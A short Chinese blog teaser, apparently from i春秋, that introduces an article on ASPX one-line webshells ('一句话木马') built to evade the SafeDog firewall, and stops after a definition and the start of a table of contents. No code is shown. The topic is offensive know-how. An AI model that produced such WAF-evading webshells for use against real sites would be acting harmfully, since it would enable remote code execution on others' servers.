  hi,我是凉风,(以下内容纯属个人见解,如有不同的意见欢迎回复指出) ,本菜比发现aspx过狗的姿势不常见,不像php一样一抓一大把,于是我决定研究一下aspx本文作者:i春秋签约作家——凉风引用i春秋作家团大佬@非主流  对一句话木马的理解:一句话木马的意思就是,我们制造了一个包含远程代码执行漏洞 的web页面。目录:0×01:我没有aspx代码编写基础,我该从哪入手?0×02...
阅读全文